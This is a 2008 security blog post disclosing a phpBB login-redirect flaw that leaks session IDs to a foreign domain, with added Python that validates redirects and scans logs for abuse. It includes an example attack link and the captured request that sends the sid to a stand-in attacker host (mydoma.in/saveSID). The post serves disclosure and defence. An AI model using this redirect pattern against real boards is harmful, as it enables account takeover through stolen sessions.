hack0r.net


phpBB Vulnerability: Login redirect SessionID leakage

Posted in Computer Related, Security, Webapp Security by n00k on May 9th, 2008

Yesterday I informed the phpBB developers of a flaw I found, but they neglected this issue and told me that such vulnerabilities are unavoidable. Further, they told me that the session id on its own does not provide access, because there are some other parameters that get checked, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know what he meant, but this seems like an interesting implementation.

But let’s not get too far into the details before you know what this is all about. This is what I sent to the phpBB security tracker:

I. Problem Description

It is possible for an attacker to obtain the SessionID of a victim. The
attacker has to get the victim to visit a link like

http://www.phpBB-app.com/ucp.php?mode=login&redirect=http://mydoma.in/saveSID.

This will set the hidden redirect input field on the resulting page to
“http://mydoma.in/saveSID”. If the victim now logs in, he will be
redirected to this URL with the sid appended as a GET parameter, which
looks like this on the attacker’s server:

GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[...]

II. Impact

The leaked SessionID can be used to take over other users’ sessions and
therefore gain control over their accounts.

III. Solution

I would recommend not allowing redirects to foreign domains at all, as
it does not seem to make sense to me.
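As an added example (not code from the original post and not phpBB’s own implementation), the following Python shows how the recommendation above could be enforced: a redirect parameter is only honoured when it resolves to a path on the board itself, and everything else, including the off-site URL from the problem description, scheme-relative `//host` forms and backslash variants, falls back to a default page. The same check is then run over a few constructed access-log lines to flag login requests carrying an off-site redirect. The board host `www.phpbb-app.com`, the fallback `/index.php` and the log lines (documentation-range 203.0.113.x addresses) are assumptions made up for this example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Hypothetical board host and fallback page, constructed for this example
BOARD_HOST = "www.phpbb-app.com"
DEFAULT_TARGET = "/index.php"


def local_redirect_path(redirect: str, board_host: str = BOARD_HOST) -> Optional[str]:
    """Return the on-board path a redirect parameter points to, or None if it
    would leave the board.

    Accepted: relative paths (e.g. "viewtopic.php?t=1") and absolute http(s)
    URLs whose host is exactly the board host. Everything else is rejected,
    including scheme-relative "//host/..." and backslashes, which browsers
    treat as forward slashes in the authority part.
    """
    candidate = redirect.strip().replace("\\", "/")
    if not candidate:
        return None
    # Embedded CR/LF or other control characters in a Location header would
    # allow response-header injection, so refuse them outright
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in candidate):
        return None
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only http(s) back to our own host
        # passes; hostname also strips any "user@" prefix and port
        if parts.scheme not in ("http", "https"):
            return None
        if parts.hostname != board_host.lower():
            return None
        path = parts.path or "/"
    else:
        path = parts.path
    if not path.startswith("/"):
        path = "/" + path
    return path + ("?" + parts.query if parts.query else "")


def safe_redirect_target(redirect: Optional[str], board_host: str = BOARD_HOST) -> str:
    """What a login handler should redirect to after a successful login: the
    validated local path, or the default page if the parameter is missing or
    points off-site. The session id is therefore never sent to a foreign host."""
    if redirect is None:
        return DEFAULT_TARGET
    return local_redirect_path(redirect, board_host) or DEFAULT_TARGET


# Constructed access-log lines (not real traffic). The third line uses a
# scheme-relative URL, which a naive "starts with http://" check would miss.
SAMPLE_LOG = """\
203.0.113.7 - - [09/May/2008:10:01:12 +0200] "GET /ucp.php?mode=login&redirect=http://mydoma.in/saveSID HTTP/1.1" 200 4123
203.0.113.8 - - [09/May/2008:10:02:40 +0200] "GET /ucp.php?mode=login&redirect=viewtopic.php%3Ft%3D42 HTTP/1.1" 200 4119
203.0.113.9 - - [09/May/2008:10:03:05 +0200] "GET /ucp.php?mode=login&redirect=//mydoma.in/saveSID HTTP/1.1" 200 4120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def off_site_redirects(log_text: str, board_host: str = BOARD_HOST) -> List[Tuple[str, str]]:
    """Return (client, redirect) pairs for login requests whose redirect
    parameter would send the user, and with it the sid, off the board."""
    flagged: List[Tuple[str, str]] = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        if query.get("mode") != ["login"] or "redirect" not in query:
            continue
        redirect = query["redirect"][0]
        if local_redirect_path(redirect, board_host) is None:
            flagged.append((line.split()[0], redirect))
    return flagged


if __name__ == "__main__":
    for client, redirect in off_site_redirects(SAMPLE_LOG):
        print(f"{client} requested login with off-site redirect {redirect!r}")
```

The validator deliberately rebuilds the target from the parsed path and query rather than echoing the original string, so anything that survives the check is a plain local path and the host comparison cannot be confused by `user@host` or port tricks.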

Let’s get back to their objections. The first check, against the User-Agent header, really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.

The second is much more tricky, as it is comparatively easy to forge an IP but pretty hard to receive the response to such a request. Well, at least to my knowledge. As far as I could see, they use nonces as session riding prevention, so you need to have the nonce to do state-changing requests.

But nevertheless, I think every effort should be made to keep the sid parameter from leaking outside the domain. Maybe someone else knows how to exploit this, or someday someone will find a way to do so.


One Response to 'phpBB Vulnerability: Login redirect SessionID leakage'


  1. masud said,

    on February 10th, 2011 at 11:57 am

    yes it’s VVI
